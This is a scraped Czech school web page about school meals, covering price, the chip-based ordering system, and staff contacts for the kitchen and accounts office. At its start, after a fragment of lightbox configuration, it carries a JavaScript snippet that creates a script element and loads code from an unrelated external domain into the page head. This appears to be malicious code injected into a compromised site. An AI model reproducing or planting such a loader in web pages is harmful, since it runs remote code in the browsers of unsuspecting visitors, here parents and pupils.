, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false });var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script);})

Informace pro rodiče a žáky o školním stravování

Školní stravování je na SŠE zajišťováno ve školní jídelně dovozem ze SŠSS Krakovská, Ostrava-Hrabůvka. Cena oběda je stanovena na Kč 30,- pro žáky. Dodavatel při změně ceny – navýšení, je povinen tuto informaci předat naší organizaci, a ta provede změnu a seznámí s ní strávníky.

Podmínky školního stravování

Naše škola má v provozu stravovací systém založený na identifikaci strávníka při výdeji stravy pomocí bezkontaktního čipu. Důležitým rysem systému je princip plné odpovědnosti strávníka za objednávky. Strávník zodpovídá i za stav svého účtu (dostatečný kredit), který je podmínkou pro možnost objednání a odběru stravy.

Kontaktní osoby:

Vedoucí kuchyně-výdejny:
Zdeňka Fussová – připomínky týkající se provozu školní jídelny a jídelníčku na tel. č. 556205233 nebo e-mail: fussova@sse-najizdarne.cz

Účtárna:
Ing. Drahoslava Knapková – dotazy a připomínky týkající se plateb a kreditů na obědy + variabilní symboly na tel. č. 556205217, knapkova@sse-najizdarne.cz
Miluše Candulasová – prodej čipů na tel. č. 556205228

ZŘ pro ekonomiku:
Ing. Jarmila Břeňová, tel. č. 556205214, e-mail: brenova @sse-najizdarne.cz